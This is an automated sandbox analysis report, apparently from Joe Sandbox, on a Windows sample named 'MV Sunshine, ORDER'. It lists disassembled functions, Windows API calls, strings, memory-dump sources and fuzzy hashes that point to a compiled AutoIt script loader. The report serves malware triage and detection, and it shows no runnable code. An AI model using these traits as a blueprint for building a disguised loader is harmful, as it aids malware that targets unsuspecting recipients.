Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 692e5f096afa2695682a11876de6fca2fa3f0691d94e52108e9e15272f2de5d9
Instruction ID: 3aacd4b137382976820b8b96a63ce5803188570d35ea3108a750bbd2f7bf3f2e
Opcode Fuzzy Hash: 692e5f096afa2695682a11876de6fca2fa3f0691d94e52108e9e15272f2de5d9
Instruction Fuzzy Hash: 1091D63194A7C5DEC731DB7885511EAFFE8AF2A310B484E5ED0CB93B41D224E948C759

Function 00984FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00984EEE,?,?,00000000,00000000), ref: 00984FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00984EEE,?,?,00000000,00000000), ref: 00985010
LoadResource.KERNEL32(?,00000000,?,?,00984EEE,?,?,00000000,00000000,?,?,?,?,?,?,00984F8F), ref: 009BDD60
SizeofResource.KERNEL32(?,00000000,?,?,00984EEE,?,?,00000000,00000000,?,?,?,?,?,?,00984F8F), ref: 009BDD75
LockResource.KERNEL32(00984EEE,?,?,00984EEE,?,?,00000000,00000000,?,?,?,?,?,?,00984F8F,00000000), ref: 009BDD88

Strings

SCRIPT, xrefs: 00985006

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 8f238cfabb102b263871f8ce66ba15489c16a40048178a907566347cf5fe98bf
Instruction ID: 76147bce69217c1bdba0cf3bb6c7e0c3d8172d9cceb2f2634f4ca7d945780bdf
Opcode Fuzzy Hash: 8f238cfabb102b263871f8ce66ba15489c16a40048178a907566347cf5fe98bf
Instruction Fuzzy Hash: 6B119A74200704BFD7319FA5DC48FA77BBDEBC9B51F208168F40AA66A0DB71E806C660

Function 009E4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,009BE7C1), ref: 009E46A6
FindFirstFileW.KERNELBASE(?,?), ref: 009E46B7
FindClose.KERNEL32(00000000), ref: 009E46C7

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: c1a90edeece6cf32cb3a31ff84dea51086d7b2684db04fe9f36fecd7eacbac3a
Instruction ID: 6de5e0d68350291d0adb712d92f7102987d107efc5a5e01ed5293494578c7ab4
Opcode Fuzzy Hash: c1a90edeece6cf32cb3a31ff84dea51086d7b2684db04fe9f36fecd7eacbac3a
Instruction Fuzzy Hash: 3CE0D8314104045F8220F778EC4D4EA775C9E06335F100715F935D14E0E7B06D518596

Function 0098E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 009C428C

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: c2903cd6e19a4494802f9d76874a520c27cb780499df320f48372dca6d6a472b
Instruction ID: ea3ed61051cf48c32777b3efae0837e0bca5639c6ebd044c111767cbbe2354cf
Opcode Fuzzy Hash: c2903cd6e19a4494802f9d76874a520c27cb780499df320f48372dca6d6a472b
Instruction Fuzzy Hash: 8FA29B74E04215CFCB24EF98C4A0AAEB7B5FF89300F248469E916AB351D775ED42CB91

Function 00990B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00990BBB
timeGetTime.WINMM ref: 00990E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00990FB3
TranslateMessage.USER32(?), ref: 00990FC7
DispatchMessageW.USER32(?), ref: 00990FD5
Sleep.KERNEL32(0000000A), ref: 00990FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 0099105A
DestroyWindow.USER32 ref: 00991066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00991080
Sleep.KERNEL32(0000000A,?,?), ref: 009C52AD
TranslateMessage.USER32(?), ref: 009C608A
DispatchMessageW.USER32(?), ref: 009C6098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009C60AC

Strings

@GUI_WINHANDLE, xrefs: 009C53B9
@COM_EVENTOBJ, xrefs: 009C591A
@TRAY_ID, xrefs: 009C5BB9
@GUI_CTRLID, xrefs: 009C5364
@GUI_CTRLHANDLE, xrefs: 009C540E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: 59458950aab7245c596f94488ecf7486b4b09fef91a7cae3fe3f297402626f78
Instruction ID: cebcb2ff1408ff2b43961a5d487a82584cf67db647aeab02c9ce91699dd6ead9
Opcode Fuzzy Hash: 59458950aab7245c596f94488ecf7486b4b09fef91a7cae3fe3f297402626f78
Instruction Fuzzy Hash: B3B2CE70A08741DFDB24DB24C884FAAB7E8BFC5304F14491DE49A972A1DB75E885CB93

Function 009E93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009E91E9: __time64.LIBCMT ref: 009E91F3

Part of subcall function 00985045: _fseek.LIBCMT ref: 0098505D

__wsplitpath.LIBCMT ref: 009E94BE

Part of subcall function 009A432E: __wsplitpath_helper.LIBCMT ref: 009A436E

_wcscpy.LIBCMT ref: 009E94D1
_wcscat.LIBCMT ref: 009E94E4
__wsplitpath.LIBCMT ref: 009E9509
_wcscat.LIBCMT ref: 009E951F
_wcscat.LIBCMT ref: 009E9532

Part of subcall function 009E922F: _memmove.LIBCMT ref: 009E9268
Part of subcall function 009E922F: _memmove.LIBCMT ref: 009E9277

_wcscmp.LIBCMT ref: 009E9479

Part of subcall function 009E99BE: _wcscmp.LIBCMT ref: 009E9AAE
Part of subcall function 009E99BE: _wcscmp.LIBCMT ref: 009E9AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009E96DC
_wcsncpy.LIBCMT ref: 009E974F
DeleteFileW.KERNEL32(?,?), ref: 009E9785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009E979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009E97AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009E97BE

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 52a2e83a1c0f56ed3390a2ee33639c1895b35bb5af3900a6e76887b30d175e7e
Instruction ID: 353431f6b638e794fad6c325cb3c8a8a1b4b72f26212f8f09187664ef3ef0e3c
Opcode Fuzzy Hash: 52a2e83a1c0f56ed3390a2ee33639c1895b35bb5af3900a6e76887b30d175e7e
Instruction Fuzzy Hash: 6EC12BB1D00219AEDF21DF95CC85ADEB7BDAF95300F0040AAF609E6251EB709E858F65

Function 00983015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00983074
RegisterClassExW.USER32(00000030), ref: 0098309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
InitCommonControlsEx.COMCTL32(?), ref: 009830CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
LoadIconW.USER32(000000A9), ref: 009830F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101

Strings

0, xrefs: 00983056
AutoIt v3 GUI, xrefs: 00983090
+, xrefs: 0098305D
TaskbarCreated, xrefs: 009830A4

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 32354fc93e70d75bc09fd289525a00b175243626af6f1348ffb99127c8e650a3
Instruction ID: de3c7039f4c66402db4fb713be936c003f2fc11e7b59fc957b93a5ab8cf77517
Opcode Fuzzy Hash: 32354fc93e70d75bc09fd289525a00b175243626af6f1348ffb99127c8e650a3
Instruction Fuzzy Hash: A4312CB9941309EFDB50DFE4D889AC9BBF0FB0A310F10452AE590E62A0E7B60547CF52

Function 00983041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00983074
RegisterClassExW.USER32(00000030), ref: 0098309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
InitCommonControlsEx.COMCTL32(?), ref: 009830CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
LoadIconW.USER32(000000A9), ref: 009830F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101

Strings

0, xrefs: 00983056
AutoIt v3 GUI, xrefs: 00983090
+, xrefs: 0098305D
TaskbarCreated, xrefs: 009830A4

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 6ed0e1c5daee0e67da03718ec9098d93cb7f9a9d7ed6bf9bd22fd218a64446e8
Instruction ID: 212c3ef02ffb662633f63410b5f13f02cb7eedb34c21c3166cf3fd4911dc635c
Opcode Fuzzy Hash: 6ed0e1c5daee0e67da03718ec9098d93cb7f9a9d7ed6bf9bd22fd218a64446e8
Instruction Fuzzy Hash: A621B4B9900318AFDB10DFE4E849BDDBBF4FB0A700F00412AF910A66A0D7B245468F92

Function 009871EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00984864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A462F8,?,009837C0,?), ref: 00984882

Part of subcall function 009A074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,009872C5), ref: 009A0771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00987308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009BECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009BED32
RegCloseKey.ADVAPI32(?), ref: 009BED70
_wcscat.LIBCMT ref: 009BEDC9

Strings

\Include\, xrefs: 009872C5
\, xrefs: 009BEDEC
Include, xrefs: 009BECE8, 009BED29
Software\AutoIt v3\AutoIt, xrefs: 009872FE

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: ab002d0a97ced3e63cebf681eab8ae0d67dee93898ef62bbdf75cf67a40825f5
Instruction ID: 4895236734ca42062f52b6ed4cdce190f318d5e587c8ea2440790221a0a501c9
Opcode Fuzzy Hash: ab002d0a97ced3e63cebf681eab8ae0d67dee93898ef62bbdf75cf67a40825f5
Instruction Fuzzy Hash: 8E717B794083419EC314EFA5EC81ADFBBE8BFC6750B50492EF445932A0EBB1D949CB91

Function 00983A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00983A62
LoadCursorW.USER32(00000000,00007F00), ref: 00983A71
LoadIconW.USER32(00000063), ref: 00983A88
LoadIconW.USER32(000000A4), ref: 00983A9A
LoadIconW.USER32(000000A2), ref: 00983AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00983AD2
RegisterClassExW.USER32(?), ref: 00983B28

Part of subcall function 00983041: GetSysColorBrush.USER32(0000000F), ref: 00983074
Part of subcall function 00983041: RegisterClassExW.USER32(00000030), ref: 0098309E
Part of subcall function 00983041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
Part of subcall function 00983041: InitCommonControlsEx.COMCTL32(?), ref: 009830CC
Part of subcall function 00983041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
Part of subcall function 00983041: LoadIconW.USER32(000000A9), ref: 009830F2
Part of subcall function 00983041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101

Strings

#, xrefs: 00983B0D
0, xrefs: 00983B06
AutoIt v3, xrefs: 00983B17

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: bc76a8acf56cd7f2e64f66e7b9720ff3acca6f4c3abed760485d8d3f1c37d73b
Instruction ID: 1dcd6e5937c3aa3ee7c67f16d4e34932f2d223d5221b4f191c12db0d0cf2bfb9
Opcode Fuzzy Hash: bc76a8acf56cd7f2e64f66e7b9720ff3acca6f4c3abed760485d8d3f1c37d73b
Instruction Fuzzy Hash: 10210AB9D00308FFEB10DFE4EC09BDD7BB5EB4A711F004129E504A62A0D3B655568F56

Function 00983633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 009836D2
KillTimer.USER32(?,00000001), ref: 009836FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0098371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0098372A
CreatePopupMenu.USER32 ref: 0098373E
PostQuitMessage.USER32(00000000), ref: 0098375F

Strings

TaskbarCreated, xrefs: 00983725

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: c853eb92781bedc7a6589e8b49ccb913ba526b3305fcc812f6555ed67869a141
Instruction ID: fd2efff028fc64f6df0717c6a0c0ba23b209c2f8bb6cd7c01ef7a084aa990c71
Opcode Fuzzy Hash: c853eb92781bedc7a6589e8b49ccb913ba526b3305fcc812f6555ed67869a141
Instruction Fuzzy Hash: 9E4141B9104145BBDF24BF7CDC0ABBD3758FB82700F144529F501963A1EAA6DD069763

Function 00983778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteLine, xrefs: 009838B9
/AutoIt3ExecuteScript, xrefs: 009838CE
CMDLINE, xrefs: 00983834
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 009837C0
CMDLINERAW, xrefs: 0098380D
/AutoIt3OutputDebug, xrefs: 009838A4
/ErrorStdOut, xrefs: 0098388F

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 6b084727c6480913a8505d3b86c5e71f5bc97853dc952b81aa136826c7b3c313
Instruction ID: 39ab474fad52954f3c4269f4d139e4db404954b1f0850d9aed93e2d765d1f639
Opcode Fuzzy Hash: 6b084727c6480913a8505d3b86c5e71f5bc97853dc952b81aa136826c7b3c313
Instruction Fuzzy Hash: 67A15C75D1022DAACB04FBA0CC95EEEB778BF95700F544429F412B7291EF759A09CBA0

Function 02222610 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 022226E1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02222907

Memory Dump Source

Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction ID: 9918080aca3c5c7b1c4c8d25f9fba66f53a0704f72959b2998985da2bed77c95
Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction Fuzzy Hash: 2DA11674E10219EBDB14CFE4C894BEEB7B5BF48304F208259E501BB284D77A9A44CFA5

Function 009839E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00983A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983A36
ShowWindow.USER32(00000000,?,?), ref: 00983A4A
ShowWindow.USER32(00000000,?,?), ref: 00983A53

Strings

edit, xrefs: 00983A30
AutoIt v3, xrefs: 00983A0D, 00983A12, 00983A13

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 2226028247f9884f39ebab28b0832f9b94014121cacab3c0e06becdd5cc278b4
Instruction ID: 096cae269cfe100d7892706f54f061461750b2297fb95e184a90994763664074
Opcode Fuzzy Hash: 2226028247f9884f39ebab28b0832f9b94014121cacab3c0e06becdd5cc278b4
Instruction Fuzzy Hash: 80F030B8A402947EEB3197976C08EA73E7DE7C7F50B000029B900A21B0C1E60802CA71

Function 022223B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 022222A0: Sleep.KERNELBASE(000001F4), ref: 022222B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 022224FA

Strings

YR89F8H6AH97VJC2N3IJNJNB, xrefs: 0222255D, 02222560

Memory Dump Source

Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CreateFileSleep
String ID: YR89F8H6AH97VJC2N3IJNJNB
API String ID: 2694422964-127585616
Opcode ID: d66fb3e19efb85c3c532558a0a0801c3a86f686cda584bdd5d7034692819929e
Instruction ID: dcfe323a6f534ffc1d1772812b7a140a44959c46a74b103fbef0c62bfe80b1d2
Opcode Fuzzy Hash: d66fb3e19efb85c3c532558a0a0801c3a86f686cda584bdd5d7034692819929e
Instruction Fuzzy Hash: 8F61A470D14258EBEF11DBE4C854BEEBBB9AF15300F008199E6487B2C1D7BA0B49CB65

Function 0098410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009BD5EC

Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66

_memset.LIBCMT ref: 0098418D
_wcscpy.LIBCMT ref: 009841E1
